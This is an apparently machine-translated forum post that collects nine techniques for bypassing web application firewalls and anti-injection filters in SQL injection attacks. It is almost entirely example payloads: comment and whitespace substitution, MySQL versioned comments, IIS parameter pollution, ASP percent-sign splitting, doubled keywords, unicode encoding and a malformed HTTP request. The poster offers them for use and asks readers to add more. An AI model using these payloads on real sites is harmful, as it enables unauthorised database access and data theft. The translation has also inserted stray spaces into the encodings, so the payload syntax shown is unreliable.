A set of test solutions including WAF for bypassing the anti-Injection System

Original address: http://bbs.10hst.com/viewthread.php? Tid = 39 & extra = page % 3D1
====== Bypass the anti-injection system, including the test code of WAF ======
Solution 1: Replace the space in the test code with/**/or + (Note:/**/and + do not perform url encoding)
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02 03	For example, id = 1 or 1 = 1 Id = 1/**/or/**/1 = 1 Id = 1 + or + 1 = 1

Solution 2: replace spaces with invisible characters % 09% 0A % 0D % 0B
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02 03 04	For example, id = 1 or 1 = 1 Id = 1% 09or % 091 = 1 Id = 1% 0Aor % 0A1 = 1 Id = 1% 0A % 0Bor % 0A % 0B1 = 1

Solution 3: Use the keyword /*! */Package, note that this method is only applicable to mysql database sites
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 and 1 = 1 Id = 1 /*! And */1 = 1

Solution 4: Use the parameter pollution method to attack and bypass. Note that this method is only applicable when the web server is Microsoft IIS.
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 union select 1 from admin Id = 1 union/* & id = */select/* & id = */from/* & id = */admin

Solution 5: Use % bypass. Note that this method is only applicable to asp/aspx
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 union select 1 from admin Id = 1 un % io % n sel % e % ct 1 fr % o % m ad % m % in

Solution 6: Use % 23 (# in plaintext) and % 0A in combination. Note that this method is only applicable to mysql database sites.
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 union select 1 from admin Id = 1% 23 afafasdf % 0 Aunion % 23 afafasdf % 0 Aselect % 23 afafasdf % 0A1% 23 afafasdf % 0 Afrom % 23 afafasdf % 0 Aadmin

Solution 7: use duplicate keywords to bypass
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 union select 1 from admin Id = 1 ununionion seleselectct 1 frofromm admin

Solution 8: use unicode encoding to bypass
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02	For example, id = 1 union select 1 from admin Id = 1% u0075 % u006e % u0069 % u006f % u006e select 1% u0066 % u0072 % u006f % u006d admin

Solution 9: Use a malformed package to bypass, only applicable to asp/aspx. For more information, see 80 sec sites.
?

To copy the Code as it is, double-click the code and right-click the code to copy it.
01 02 03 04 05 06 07 08	For example, id = 1 union select 1 from admin GET/test. asp HTTP/1.1 Host: 172.16.15.50 Content-Type: application/x-www-form-urlencoded Content-Length: 15 T = 3 */select /*

The above is my collection method. Who else has a new solution? Please add it.